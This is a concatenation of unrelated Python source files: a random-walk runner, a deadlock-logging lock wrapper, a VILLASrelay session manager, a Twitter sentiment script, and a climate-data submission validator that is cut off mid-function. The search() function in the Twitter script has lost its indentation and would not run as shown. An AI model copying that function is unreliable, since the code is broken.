    client = Client()
    client.start()
    for worker in (print_messages, write):
        threading.Thread(target=worker, args=(client,)).start()
# Run the chat client when executed as a script.
if __name__ == "__main__":
    main()
|
walker.py | import os
from threading import Lock, Thread
from walk import RWGraph
from utils import get_G_from_edges
class Walker:
    """Runs random walks over each layer of a multi-layer network in parallel.

    :param network_data: mapping of layer id -> edge list for that layer
    :param num_walks: number of walks started per node
    :param walk_length: number of steps per walk
    :param schema: optional metapath schema forwarded to simulate_walks
    :param node_type: node-type mapping forwarded to RWGraph
    """
    def __init__(self, network_data, num_walks, walk_length, schema, node_type):
        super().__init__()
        self.network_data = network_data
        self.num_walks = num_walks
        self.walk_length = walk_length
        self.schema = schema
        self.node_type = node_type
        # One result slot per layer, filled in by _walk (idiomatic replacement
        # for the original append-None loop).
        self.walks = [None for _ in network_data]
    def _walk(self, layer_id, index):
        """Worker: simulate walks for one layer and store them at *index*."""
        edges = self.network_data[layer_id]
        # start to do the random walk on a layer
        layer_walker = RWGraph(get_G_from_edges(edges), node_type=self.node_type)
        self.walks[index] = layer_walker.simulate_walks(
            self.num_walks, self.walk_length, schema=self.schema)
    def walk(self):
        """Launch one thread per layer, wait for all, and return the walks."""
        threads = []
        for index, layer_id in enumerate(self.network_data):
            th = Thread(target=self._walk, args=(layer_id, index))
            threads.append(th)
            th.start()
        for th in threads:
            th.join()
        return self.walks
threading.py | """Functionality for working multi-threaded code."""
import inspect
import logging
import threading
import time
from typing import Dict, Tuple
from .._internal.trace import trace_str
class DeadlockMonitor:
    """A monitor for deadlocked LoggingLocks.

    A background thread periodically scans the registered locks and logs an
    error when any lock has been held longer than ``timeout_sec``.
    """
    timeout_sec: float  # age after which a held lock is considered deadlocked
    sleep_sec: float  # pause between scans
    # lock_id -> (acquire_time, lock_id, name, stack trace at acquire)
    locks: Dict[int, Tuple[float, int, str, str]]
    _lock: threading.Lock
    _thread: threading.Thread
    def __init__(self, timeout_sec: float, sleep_sec: float):
        self.timeout_sec = timeout_sec
        self.sleep_sec = sleep_sec
        self.locks = {}
        self._lock = threading.Lock()
        # daemon=True so this never-ending monitor thread does not keep the
        # interpreter alive at shutdown (the original non-daemon thread
        # prevented normal process exit).
        self._thread = threading.Thread(target=self._run, daemon=True)
        self._thread.start()
        # Kept for backward compatibility with code reading this attribute.
        setattr(self, "deadlock_monitor_thread", self._thread)
    def _run(self):
        """Scan forever, sleeping sleep_sec between scans."""
        while True:
            self._check_for_deadlocks()
            time.sleep(self.sleep_sec)
    def _check_for_deadlocks(self):
        """Log (at most once per scan) if any registered lock exceeded timeout_sec."""
        with self._lock:
            t = time.time()
            for k, v in self.locks.items():
                if t - v[0] > self.timeout_sec:
                    self._log_deadlock()
                    return
    def _log_deadlock(self):
        """Log details of all currently registered locks. Caller must hold _lock."""
        t = time.time()
        msg = "A likely deadlock was detected! Please create an issue at https://github.com/deephaven-examples/deephaven-ib/issues containing this error message\nOpen locks:\n"
        for k, v in self.locks.items():
            msg += f"age_sec={t-v[0]} lock_id={v[1]} name={v[2]}\n"
        msg += "\n\nStacks:\n\n"
        for k, v in self.locks.items():
            msg += f"age_sec={t-v[0]} lock_id={v[1]} name={v[2]}\n{v[3]}\n"
        logging.error(msg)
    def acquire(self, lock_id: int, name: str, stack: str) -> None:
        """Register that *lock_id* was acquired, recording time, name and stack."""
        with self._lock:
            self.locks[lock_id] = (time.time(), lock_id, name, stack)
    def release(self, lock_id: int):
        """Deregister *lock_id*; tolerates repeated releases."""
        with self._lock:
            # pop is used here instead of del, because there are instances where the locks are released multiple times
            self.locks.pop(lock_id, None)
# Monotonically increasing id source for LoggingLock instances.
_lock_id: int = 0
# Guards _lock_id increments across threads.
_lock: threading.Lock = threading.Lock()
# Module-wide monitor: flags locks held longer than 3 minutes, scanning every
# 10 seconds.  NOTE: constructing it here starts a background thread at
# import time.
_deadlock_monitor: DeadlockMonitor = DeadlockMonitor(3 * 60.0, 10.0)
def _next_lock_id() -> int:
    """Return the next unique lock id (thread-safe).

    The incremented value is read while still holding ``_lock``; the original
    returned after releasing the lock, so a concurrent increment could make
    two calls return the same id.
    """
    global _lock_id
    with _lock:
        _lock_id += 1
        return _lock_id
class LoggingLock(object):
    """A threading lock that logs lock acquisition and release."""
    name: str  # human-readable lock name used in log messages
    log_stack: bool  # when True, every log line includes a stack trace
    def __init__(self, name: str, lock=None, log_level=logging.DEBUG, log_stack: bool = False):
        """Wrap *lock* (a new threading.Lock when None) with logging.

        :param name: label included in every log message
        :param lock: underlying lock object; defaults to a new threading.Lock
        :param log_level: level used for acquire/release log lines
        :param log_stack: include a stack trace in each log line when True
        """
        if lock is None:
            lock = threading.Lock()
        self.name = str(name)
        self.log_level = log_level
        self.lock = lock
        self.log_stack = log_stack
        # Unique id used to correlate log lines and deadlock-monitor entries.
        self.id = _next_lock_id()
        # inspect.stack()[1][3] is the caller's function name.
        self._log(f"{inspect.stack()[1][3]} created {self.name}")
    def _log(self, msg: str) -> None:
        """Emit *msg* at the configured level, tagged with lock and thread ids."""
        if self.log_stack:
            msg = f"{msg}: lock_id={self.id} thread_id={threading.get_ident()}\n{trace_str()}"
        else:
            msg = f"{msg}: lock_id={self.id} thread_id={threading.get_ident()}"
        logging.log(self.log_level, msg)
    def acquire(self, blocking=True):
        """Acquire the underlying lock, logging and registering with the deadlock monitor."""
        self._log(f"{inspect.stack()[1][3]} trying to acquire {self.name}")
        # Register before blocking so a stuck acquire shows up in the monitor.
        if _deadlock_monitor:
            _deadlock_monitor.acquire(self.id, self.name, trace_str())
        ret = self.lock.acquire(blocking)
        if ret:
            self._log(f"{inspect.stack()[1][3]} acquired {self.name}")
        else:
            # NOTE(review): on a failed non-blocking acquire the monitor entry
            # is not removed here -- presumably callers retry or release;
            # otherwise a false deadlock may be reported.
            self._log(f"{inspect.stack()[1][3]} non-blocking acquire of {self.name} lock failed")
        return ret
    def release(self):
        """Release the underlying lock and deregister from the deadlock monitor."""
        self._log(f"{inspect.stack()[1][3]} releasing {self.name}")
        if _deadlock_monitor:
            _deadlock_monitor.release(self.id)
        self.lock.release()
    def __enter__(self):
        self.acquire()
    def __exit__(self, exc_type, exc_val, exc_tb):
        self.release()
        return False  # True causes exceptions to be swallowed. False causes exceptions to be handled.
|
villas_relay.py | import threading
import requests
import os
from villas.controller.components.manager import Manager
from villas.controller.components.gateways.villas_relay import VILLASrelayGateway # noqa E501
class VILLASrelayManager(Manager):
    """Manager component mirroring the sessions of a VILLASrelay instance.

    Polls the relay's HTTP API every 2 seconds and keeps one gateway
    component per active relay session.
    """
    def __init__(self, **args):
        self.autostart = args.get('autostart', False)
        # REST endpoint of the relay; api_url_external is what is advertised
        # to other components (may differ behind a proxy).
        self.api_url = args.get('api_url', 'http://localhost:8088') + '/api/v1'
        self.api_url_external = args.get('api_url_external', self.api_url)
        self.thread_stop = threading.Event()
        self.thread = threading.Thread(target=self.reconcile_periodically)
        # Adopt the relay's own UUID as this component's UUID when reachable.
        uuid = self.get_uuid()
        if uuid is not None:
            args['uuid'] = uuid
        super().__init__(**args)
        self.properties['api_url'] = self.api_url_external
    def get_uuid(self):
        """Return the relay's UUID, or None if the API is unreachable."""
        try:
            r = requests.get(self.api_url)
            r.raise_for_status()
            return r.json().get('uuid')
        except requests.exceptions.RequestException:
            return None
    def get_status(self):
        """Return the relay's status JSON; flag an error and return None on failure."""
        try:
            r = requests.get(self.api_url)
            r.raise_for_status()
            return r.json()
        except requests.exceptions.RequestException:
            self.change_to_error('Failed to contact VILLASrelay')
            return None
    def reconcile_periodically(self):
        """Poll loop: reconcile every 2 seconds until thread_stop is set."""
        while not self.thread_stop.wait(2):
            self.reconcile()
    def reconcile(self):
        """Synchronize managed components with the relay's active sessions."""
        try:
            # NOTE(review): get_status() returns None when the relay is
            # unreachable, making the subscript below raise and land in the
            # except branch -- confirm this is the intended error path.
            self._status = self.get_status()
            active_sessions = self._status['sessions']
            active_uuids = {session['uuid'] for session in active_sessions}
            existing_uuids = set(self.components.keys())
            # Add new sessions and update existing ones
            for session in active_sessions:
                uuid = session['uuid']
                if uuid in self.components:
                    comp = self.components[uuid]
                else:
                    comp = VILLASrelayGateway(self, session)
                    self.add_component(comp)
                comp.change_state('running')
            # Find vanished sessions
            for uuid in existing_uuids - active_uuids:
                comp = self.components[uuid]
                comp.change_state('stopped')
                # We dont remove the components here
                # So that they dont get removed from the backend
                # and get recreated with the same UUID later
                # self.remove_component(comp)
            if len(active_sessions) > 0:
                self.change_state('running')
            else:
                self.change_state('paused')
        except Exception as e:
            self.change_to_error('failed to reconcile',
                                 exception=str(e),
                                 args=e.args)
    @property
    def status(self):
        """Parent status augmented with the relay's reported version."""
        status = super().status
        # NOTE(review): _status may be None (or unset before the first
        # reconcile), in which case .get raises -- verify call ordering.
        status['status']['villas_relay_version'] = self._status.get('version')
        return status
    def on_shutdown(self):
        """Stop the poll thread before delegating shutdown to the parent."""
        self.thread_stop.set()
        self.thread.join()
        return super().on_shutdown()
    def on_ready(self):
        """Optionally launch villas-relay, then start the poll thread."""
        if self.autostart:
            os.system('villas-relay')
        self.thread.start()
        super().on_ready()
|
analyze.py | #!/usr/bin/env python
# Copyright 2013 AlchemyAPI
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import base64
import urllib2
import urllib
from alchemyapi import AlchemyAPI
# Import the user's Twitter credentials; if config.py is missing, write a
# template file and exit so the user can fill it in.
try:
    import config
except ImportError:
    print '\nError finding Twitter credentials in config.py, please add them'
    f = open('config.py','w+')
    f.write("consumer_key='TWITTER_API_CONSUMER_KEY'\n")
    f.write("consumer_secret='TWITTER_API_CONSUMER_SECRET'\n")
    f.close()
    sys.exit()
def oauth():
    """
    Connect with the Twitter API to request the OAuth access token.
    The token will be used to authorize the Twitter API search.
    INPUT:
    config.consumer_key -> the Twitter API consumer key, stored in config.py
    config.consumer_secret -> the Twitter API consumer secret, stored in config.py
    OUTPUT:
    auth.access_token -> the token
    auth.token_type -> the type of token (i.e. bearer)
    """
    print ''
    print 'Requesting OAuth token from Twitter API'
    try:
        #Twitter credientials
        consumer_key = config.consumer_key
        consumer_secret = config.consumer_secret
        #encode the credentials & setup the request (application-only auth:
        #base64 of "key:secret" with a client_credentials grant)
        encoded = base64.b64encode(consumer_key + ':' + consumer_secret)
        url = 'https://api.twitter.com/oauth2/token'
        params = { 'grant_type':'client_credentials' }
        headers = { 'Authorization':'Basic ' + encoded }
        #create the request and hit the Twitter API
        request = urllib2.Request(url, urllib.urlencode(params), headers)
        response = json.loads(urllib2.urlopen(request).read())
        #save the token
        auth = {}
        auth['access_token'] = response['access_token']
        auth['token_type'] = response['token_type']
        print 'Received token'
        print ''
        return auth
    except Exception as e:
        #any failure (missing credentials, network, bad response) is fatal
        print 'Twitter authentication failed: ', e
        sys.exit()
def search(auth, query, number_of_tweets):
"""
Using the auth token, hit the Twitter search API with the specified
query and attempt to return the requested number of tweets. If the
requested number of tweets can not be found, it will return as many
as Twitter will provide.
The Twitter response data contains many fields, and the returned data
is filtered to only return the fields specified in the code.
It will ignore retweets, defined as tweets starting with 'RT '.
INPUT:
auth -> the authentication token and token type from the OAuth process
query -> the query to search Twitter for (i.e. "Denver Broncos")
number_of_tweets -> the number of tweets to attempt to gather
OUTPUT:
tweets -> an array of tweets containing the filtered field set
"""
#create the search request
url = 'https://api.twitter.com/1.1/search/tweets.json'
headers = { 'Authorization': auth['token_type'] + ' ' + auth['access_token'] }
tweets = []
MAX_PAGE_SIZE = 100
counter = 0
next_results = ''
print 'Searching Twitter to try and find %d Tweets about "%s"' % (number_of_tweets, query)
#keep getting more data until the number of tweets have been gathered
while True:
print 'performing a search iteration, found %d Tweets thus far' % len(tweets)
count = max(MAX_PAGE_SIZE,int(number_of_tweets) - counter)
#create the request
if next_results:
request = urllib2.Request(url + next_results, headers=headers)
else:
params = { 'q':query, 'lang':'en','count':count }
request = urllib2.Request(url + '?' + urllib.urlencode(params), headers=headers)
#hit the Twitter API
data = json.loads(urllib2.urlopen(request).read())
#Scan through the Tweets and save the important information
for status in data['statuses']:
text = status['text'].encode('utf-8')
#ignore retweets (RT at start of text)
if text.find('RT ') != 0:
#save the important info (save more fields here as needed)
tweet = {}
tweet['text'] = text
tweet['screen_name'] = status['user']['screen_name']
tweet['created_at'] = status['created_at']
tweets.append(tweet)
counter += 1
#check if we've grabbed enough tweets, exit if yes
if counter >= number_of_tweets:
print 'Found all %d Tweets!' % number_of_tweets
return tweets
#setup the next iteration
if 'next_results' in data['search_metadata']:
next_results = data['search_metadata']['next_results']
else:
#if next_results is not present, it means Twitter has no more data for us, so move on
print 'Sorry, I could only find %d Tweets instead of %d' % (counter, number_of_tweets)
return tweets
def process(query, in_queue, out_queue):
    """
    The worker thread to grab a found Tweet off the queue and
    calculate the sentiment via AlchemyAPI.
    It calculates the document-level sentiment for the entire tweet, and
    it will also attempt to calculate entity-level sentiment if the query
    string is identified as an entity. If the query string is not
    identified as an entity for the tweet, no entity level sentiment
    will be returned.
    INPUT:
    query -> the query string that was used in the Twitter API search (i.e. "Denver Broncos")
    in_queue -> the shared input queue that is filled with the found tweets.
    out_queue -> the shared output queue that is filled with the analyzed tweets.
    OUTPUT:
    None
    """
    #Create the AlchemyAPI object
    alchemyapi = AlchemyAPI()
    #runs forever; the caller marks this thread as a daemon so it dies
    #with the main process
    while True:
        #grab a tweet from the queue (blocks until one is available)
        tweet = in_queue.get()
        #init
        tweet['sentiment'] = {}
        try:
            #calculate the sentiment for the entity
            response = alchemyapi.entities('text',tweet['text'], { 'sentiment': 1 })
            if response['status'] == 'OK':
                for entity in response['entities']:
                    #Check if we've found an entity that matches our query
                    if entity['text'] == query:
                        tweet['sentiment']['entity'] = {}
                        tweet['sentiment']['entity']['type'] = entity['sentiment']['type']
                        #Add the score (it's not returned if type=neutral)
                        if 'score' in entity['sentiment']:
                            tweet['sentiment']['entity']['score'] = entity['sentiment']['score']
                        else:
                            tweet['sentiment']['entity']['score'] = 0
                        #Only 1 entity can possibly match the query, so exit the loop
                        break
            #calculate the sentiment for the entire tweet
            response = alchemyapi.sentiment('text',tweet['text'])
            if response['status'] == 'OK':
                tweet['sentiment']['doc'] = {}
                tweet['sentiment']['doc']['type'] = response['docSentiment']['type']
                #Add the score (it's not returned if type=neutral)
                if 'score' in response['docSentiment']:
                    tweet['sentiment']['doc']['score'] = response['docSentiment']['score']
                else:
                    tweet['sentiment']['doc']['score'] = 0
            #add the result to the output queue
            out_queue.put(tweet)
        except Exception as e:
            #if there's an error, just move on to the next item in the queue
            #(the tweet is dropped from the output in that case)
            print 'Uh oh, this just happened: ', e
            pass
        #signal that the task is complete
        in_queue.task_done()
def analyze(tweets, query):
    """
    Spawns the thread pool and watches for the threads to finish processing
    the input queue. Once complete, it unloads the output queue into an array
    and passes it on for further processing.
    The number of threads is set to CONCURRENCY_LIMIT, which is the maximum
    number of concurrent processes allowed by AlchemyAPI for your plan. The
    concurrency limit is 5 for the free plan.
    INPUT:
    tweets -> an array containing the tweets to analyze.
    query -> the query string that was used in the Twitter API search (i.e. "Denver Broncos")
    OUTPUT:
    tweets -> an array containing the analyzed tweets
    """
    import Queue
    import threading
    #number of parallel threads to run to hit AlchemyAPI concurrently (higher is faster, the limit depends on your plan)
    CONCURRENCY_LIMIT = 5
    #init
    in_queue = Queue.Queue()
    out_queue = Queue.Queue()
    #load up the in_queue
    for tweet in tweets:
        in_queue.put(tweet)
    #Spawn and start the threads (daemons, so they die with the process)
    threads = []
    for x in xrange(CONCURRENCY_LIMIT):
        t = threading.Thread(target=process, args=(query, in_queue, out_queue))
        t.daemon = True
        threads.append(t)
        t.start()
    #init the display
    print ''
    print ''
    print 'Calculating sentiment for each tweet'
    print ''
    #Wait until the input queue is empty
    #NOTE(review): this is a busy-wait polling loop with no sleep; it burns a
    #CPU core until the queue drains -- consider in_queue.join() or a short
    #time.sleep() per iteration.
    while True:
        #print the counter
        sys.stdout.write('Tweets left to analyze: {0} \r'.format(in_queue.qsize()))
        sys.stdout.flush()
        #check if the queue has been emptied out
        if in_queue.empty():
            break
        #Check if the threads are still alive
        check = False
        for t in threads:
            if t.isAlive():
                check = True
                break
        if not check:
            #All threads have died, so quit
            break
    print 'Done analyzing!'
    #pull the data off the out_queue
    output = []
    while not out_queue.empty():
        output.append(out_queue.get())
    #return the tweets with the appended data
    return output
def output(tweets):
    """
    Prints the found tweets and the sentiment.
    INPUT:
    tweets -> an array containing the analyzed tweets.
    OUTPUT:
    None
    """
    #nothing to show: bail out of the whole script
    if len(tweets) == 0:
        print 'No tweets found'
        sys.exit()
    print ''
    print ''
    print '##########################################################'
    print '#       The Tweets                                       #'
    print '##########################################################'
    print ''
    print ''
    for tweet in tweets:
        print '@' + tweet['screen_name']
        print 'Date: ' + tweet['created_at']
        print tweet['text']
        #entity/doc sentiment keys are only present when AlchemyAPI returned them
        if 'entity' in tweet['sentiment']:
            print 'Entity Sentiment:', tweet['sentiment']['entity']['type'], '(Score:', str(tweet['sentiment']['entity']['score']) + ')'
        if 'doc' in tweet['sentiment']:
            print 'Document Sentiment:', tweet['sentiment']['doc']['type'], '(Score:', str(tweet['sentiment']['doc']['score']) + ')'
        print ''
def stats(tweets):
    """
    Calculate and print out some basic summary statistics
    INPUT:
    tweets -> an array containing the analyzed tweets
    OUTPUT:
    None
    """
    #init counters for both sentiment levels
    data = {}
    data['doc'] = {}
    data['doc']['positive'] = 0
    data['doc']['negative'] = 0
    data['doc']['neutral'] = 0
    data['doc']['total'] = 0
    data['entity'] = {}
    data['entity']['positive'] = 0
    data['entity']['negative'] = 0
    data['entity']['neutral'] = 0
    data['entity']['total'] = 0
    #loop through the tweets and count up the positive, negatives and neutrals
    #(the sentiment 'type' string doubles as the counter key)
    for tweet in tweets:
        if 'entity' in tweet['sentiment']:
            data['entity'][tweet['sentiment']['entity']['type']] += 1
            data['entity']['total'] += 1
        if 'doc' in tweet['sentiment']:
            data['doc'][tweet['sentiment']['doc']['type']] += 1
            data['doc']['total'] += 1
    #Make sure there are some analyzed tweets
    if data['doc']['total'] == 0 and data['entity']['total'] == 0:
        print 'No analysis found for the Tweets'
        sys.exit()
    #print the stats
    print ''
    print ''
    print '##########################################################'
    print '#       The Stats                                        #'
    print '##########################################################'
    print ''
    print ''
    if data['entity']['total'] > 0:
        print 'Entity-Level Sentiment:'
        print 'Positive: %d (%.2f%%)' % (data['entity']['positive'], 100.0*data['entity']['positive']/data['entity']['total'])
        print 'Negative: %d (%.2f%%)' % (data['entity']['negative'], 100.0*data['entity']['negative']/data['entity']['total'])
        print 'Neutral: %d (%.2f%%)' % (data['entity']['neutral'], 100.0*data['entity']['neutral']/data['entity']['total'])
        print 'Total: %d (%.2f%%)' % (data['entity']['total'], 100.0*data['entity']['total']/data['entity']['total'])
        print ''
        print ''
    if data['doc']['total'] > 0:
        print 'Document-Level Sentiment:'
        print 'Positive: %d (%.2f%%)' % (data['doc']['positive'], 100.0*data['doc']['positive']/data['doc']['total'])
        print 'Negative: %d (%.2f%%)' % (data['doc']['negative'], 100.0*data['doc']['negative']/data['doc']['total'])
        print 'Neutral: %d (%.2f%%)' % (data['doc']['neutral'], 100.0*data['doc']['neutral']/data['doc']['total'])
        print 'Total: %d (%.2f%%)' % (data['doc']['total'], 100.0*data['doc']['total']/data['doc']['total'])
def main(query, count):
    """
    The main script the calls each of the functions as needed.
    INPUT:
    query -> the query string to use to search the Twitter API and for finding entities
    count -> the number of Tweets to attempt to gather from the Twitter API
    OUTPUT:
    None
    """
    #pipeline: authenticate -> gather -> analyze -> display -> summarize
    auth = oauth()
    tweets = search(auth, query, count)
    tweets = analyze(tweets, query)
    output(tweets)
    stats(tweets)
#Check the command line arguments
#usage: python analyze.py "QUERY_STRING" COUNT
if not len(sys.argv) == 3:
    print "Invalid number of input arguments. Please run 'python analyze.py \"QUERY_STRING\" COUNT'"
    print "Where QUERY_STRING is what to search for (i.e. 'Denver Broncos')"
    print "And COUNT is the number of Tweets to attempt to gather\n"
    sys.exit()
#run the script
main(sys.argv[1], int(sys.argv[2]))
|
validate_data_submission.py | #!/usr/bin/env python
"""
validate_data_submission.py
This script is run by users to validate submitted data files and to create a
data submission in the Data Management Tool.
"""
from __future__ import unicode_literals, division, absolute_import
import argparse
import datetime
import itertools
import json
import logging.config
from multiprocessing import Process, Manager
from multiprocessing.pool import ThreadPool
from netCDF4 import Dataset
import os
import re
import shutil
import subprocess
import sys
import time
import warnings
try:
import dask
except ImportError:
pass
import iris
from primavera_val import (identify_filename_metadata, validate_file_contents,
identify_contents_metadata,
validate_cell_measures_contents,
identify_cell_measures_metadata, load_cube,
FileValidationError)
import django
django.setup()
from django.contrib.auth.models import User
from pdata_app.models import (Project, ClimateModel, Experiment, DataSubmission,
DataFile, VariableRequest, DataRequest, Checksum, Settings, Institute,
ActivityId, EmailQueue)
from pdata_app.utils.dbapi import get_or_create, match_one
from pdata_app.utils.common import adler32, list_files, pdt2num
from vocabs.vocabs import STATUS_VALUES, CHECKSUM_TYPES
# Ignore warnings displayed when loading data
warnings.filterwarnings("ignore")
__version__ = '0.1.0b'
DEFAULT_LOG_LEVEL = logging.WARNING
DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
logger = logging.getLogger(__name__)
CONTACT_PERSON_USER_ID = 'jseddon'
# The maximum size (in bytes) of file to read into memory for an HDF
# data integrity check
# 1073741824 = 1 GiB
MAX_DATA_INTEGRITY_SIZE = 1073741824
# Don't run PrePARE on the following var/table combinations as they've
# been removed from the CMIP6 data request, but are still needed for
# PRIMAVERA
# Additionally, don't run PrePARE on any of the PRIMAVERA only tables
SKIP_PREPARE_VARS = ['psl_E3hrPt', 'ua850_E3hrPt', 'va850_E3hrPt',
'mrlsl_Emon', 'mrlsl_Lmon', 'sialb_SImon',
'tso_3hr',
'Prim1hr', 'Prim3hr', 'Prim3hrPt', 'Prim6hr',
'Prim6hrPt', 'PrimO6hr', 'PrimOday', 'PrimOmon',
'PrimSIday', 'Primday', 'PrimdayPt', 'Primmon',
'PrimmonZ',
]
class SubmissionError(Exception):
    """
    An exception to indicate that there has been an error that means that
    the data submission cannot continue.

    Raised (rather than FileValidationError) for catastrophic problems,
    e.g. missing database objects or PrePARE failures, where the whole
    submission must be abandoned.
    """
    pass
def identify_and_validate(filenames, project, num_processes, file_format):
    """
    Loop through a list of file names, identify each file's metadata and then
    validate it. The looping is done in parallel using the multiprocessing
    library module.

    clt_Amon_HadGEM2-ES_historical_r1i1p1_185912-188411.nc

    :param list filenames: The files to process
    :param str project: The name of the project
    :param int num_processes: The number of parallel processes to use
    :param str file_format: The CMOR version of the netCDF files, one out of-
        CMIP5 or CMIP6
    :returns: A list containing the metadata dictionary generated for each file
    :rtype: multiprocessing.Manager.list
    :raises SubmissionError: If a worker signalled a catastrophic error.
    """
    jobs = []
    manager = Manager()
    # work items go to the workers through a shared queue; results come back
    # through a shared list; the event signals a fatal error in any worker
    params = manager.Queue()
    result_list = manager.list()
    error_event = manager.Event()
    # with a single process everything runs in this process (easier to
    # debug); otherwise start num_processes worker processes
    if num_processes != 1:
        for i in range(num_processes):
            p = Process(target=identify_and_validate_file,
                        args=(params, result_list, error_event))
            jobs.append(p)
            p.start()
    func_input_pair = list(zip(filenames,
                               (project,) * len(filenames),
                               (file_format,) * len(filenames)))
    # one (None, None, None) sentinel per worker tells it to exit
    blank_pair = (None, None, None)
    iters = itertools.chain(func_input_pair, (blank_pair,) * num_processes)
    for item in iters:
        params.put(item)
    if num_processes == 1:
        identify_and_validate_file(params, result_list, error_event)
    else:
        for j in jobs:
            j.join()
    if error_event.is_set():
        raise SubmissionError()
    return result_list
def identify_and_validate_file(params, output, error_event):
    """
    Identify `filename`'s metadata and then validate the file. The function
    continues getting items to process from the parameter queue until a None
    is received.

    :param multiprocessing.Manager.Queue params: A queue, with each item being a
        tuple of the filename to load, the name of the project and the netCDF
        file CMOR version
    :param multiprocessing.Manager.list output: A list containing the output
        metadata dictionaries for each file
    :param multiprocessing.Manager.Event error_event: If set then a catastrophic
        error has occurred in another process and processing should end
    """
    while True:
        # close existing connections so that a fresh connection is made
        django.db.connections.close_all()
        # another worker hit a fatal error; stop taking new work
        if error_event.is_set():
            return
        filename, project, file_format = params.get()
        # a None filename is the sentinel telling this worker to exit
        if filename is None:
            return
        try:
            _identify_and_validate_file(filename, project, file_format, output,
                                        error_event)
        except django.db.utils.OperationalError:
            # Wait and then re-run once in case of temporary database
            # high load
            logger.warning('django.db.utils.OperationalError waiting for one '
                           'minute and then retrying.')
            time.sleep(60)
            try:
                _identify_and_validate_file(filename, project, file_format,
                                            output, error_event)
            except django.db.utils.OperationalError:
                # a second failure is treated as fatal for the submission
                logger.error('django.db.utils.OperationalError for a second '
                             'time. Exiting.')
                error_event.set()
                raise
def _identify_and_validate_file(filename, project, file_format, output,
                                error_event):
    """
    Do the validation of a file.

    A FileValidationError causes the file to be skipped (a warning is logged
    and nothing is appended to `output`); a SubmissionError marks the whole
    submission as failed via `error_event`.

    :param str filename: The name of the file
    :param str project: The name of the project
    :param str file_format: The format of the file (CMIP5 or CMIP6)
    :param multiprocessing.Manager.list output: A list containing the output
        metadata dictionaries for each file
    :param multiprocessing.Manager.Event error_event: If set then a catastrophic
        error has occurred in another process and processing should end
    """
    try:
        basename = os.path.basename(filename)
        # refuse files that already exist in the database
        if DataFile.objects.filter(name=basename).count() > 0:
            msg = 'File {} already exists in the database.'.format(basename)
            raise FileValidationError(msg)
        metadata = identify_filename_metadata(filename, file_format)
        # PRIMAVERA-only tables (Prim*) always belong to the PRIMAVERA project
        if metadata['table'].startswith('Prim'):
            metadata['project'] = 'PRIMAVERA'
        else:
            metadata['project'] = project
        if 'fx' in metadata['table']:
            # fixed (time-invariant) fields are validated as cell measures
            # without loading a full cube
            cf = iris.fileformats.cf.CFReader(filename)
            metadata.update(identify_cell_measures_metadata(cf, filename))
            validate_cell_measures_contents(cf, metadata)
        else:
            cube = load_cube(filename)
            metadata.update(identify_contents_metadata(cube, filename))
            validate_file_contents(cube, metadata)
            # NOTE(review): cmd_args is a module-level name that is only set
            # in the __main__ block -- confirm worker processes always
            # inherit it (e.g. fork start method)
            _contents_hdf_check(cube, metadata, cmd_args.data_limit)
        verify_fk_relationships(metadata)
        calculate_checksum(metadata)
    except SubmissionError:
        msg = ('A serious file error means the submission cannot continue: '
               '{}'.format(filename))
        logger.error(msg)
        error_event.set()
    except FileValidationError as fve:
        msg = 'File failed validation. {}'.format(fve.__str__())
        logger.warning(msg)
    else:
        output.append(metadata)
def calculate_checksum(metadata):
    """
    Add an Adler-32 checksum to a file's metadata dictionary.

    Sets `metadata['checksum_type']` and `metadata['checksum_value']`; both
    are set to None (with a warning logged) if the checksum could not be
    calculated.

    :param dict metadata: Metadata identified for this file.
    """
    file_path = os.path.join(metadata['directory'], metadata['basename'])
    checksum = adler32(file_path)
    if not checksum:
        logger.warning('Unable to calculate checksum for file: {}'.format(
            metadata['basename']))
        metadata['checksum_type'] = None
        metadata['checksum_value'] = None
    else:
        metadata['checksum_type'] = CHECKSUM_TYPES['ADLER32']
        metadata['checksum_value'] = checksum
def verify_fk_relationships(metadata):
    """
    Identify the variable_request and data_request objects corresponding to
    this file.

    On success, `metadata['data_request']` and `metadata['variable']` are set
    to the matching database objects, and the string values for project,
    climate model, experiment, institute and activity id in `metadata` are
    replaced by the corresponding database objects.

    :param dict metadata: Metadata identified for this file.
    :raises SubmissionError: If there are no existing entries in the
        database for `Project`, `ClimateModel` or `Experiment`.
    :raises FileValidationError: If no unique data request can be found.
    """
    foreign_key_types = [
        (Project, 'project'),
        (ClimateModel, 'climate_model'),
        (Experiment, 'experiment'),
        (Institute, 'institute'),
        (ActivityId, 'activity_id')]
    # get values for each of the foreign key types
    for object_type, object_str in foreign_key_types:
        result = match_one(object_type, short_name=metadata[object_str])
        if result:
            # replace the name string with the database object
            metadata[object_str] = result
        else:
            msg = ("No {} '{}' found for file: {}. Please create this object "
                   "and resubmit.".format(object_str.replace('_', ' '),
                                          metadata[object_str],
                                          metadata['basename']))
            logger.error(msg)
            raise SubmissionError(msg)
    # find the data request
    dreq_match = match_one(
        DataRequest,
        project=metadata['project'],
        institute=metadata['institute'],
        climate_model=metadata['climate_model'],
        experiment=metadata['experiment'],
        variable_request__table_name=metadata['table'],
        variable_request__cmor_name=metadata['var_name'],
        rip_code=metadata['rip_code']
    )
    if dreq_match:
        metadata['data_request'] = dreq_match
        metadata['variable'] = dreq_match.variable_request
    else:
        # if cmor_name doesn't match then it may be a variable where out_name
        # is different to cmor_name so check these
        dreq_matches = DataRequest.objects.filter(
            project=metadata['project'],
            institute=metadata['institute'],
            climate_model=metadata['climate_model'],
            experiment=metadata['experiment'],
            variable_request__table_name=metadata['table'],
            variable_request__var_name=metadata['var_name'],
            rip_code=metadata['rip_code']
        )
        if dreq_matches.count() == 0:
            msg = ('No data request found for file: {}.'.
                   format(metadata['basename']))
            logger.error(msg)
            raise FileValidationError(msg)
        elif dreq_matches.count() == 1:
            metadata['data_request'] = dreq_matches[0]
            metadata['variable'] = dreq_matches[0].variable_request
        else:
            # several candidates: try to disambiguate by the name of the
            # pressure-level dimension in the actual file
            try:
                plev_name = _guess_plev_name(metadata)
            except Exception:
                msg = ('Cannot open file to determine plev name: {}.'.
                       format(metadata['basename']))
                logger.error(msg)
                raise FileValidationError(msg)
            if plev_name:
                plev_matches = dreq_matches.filter(
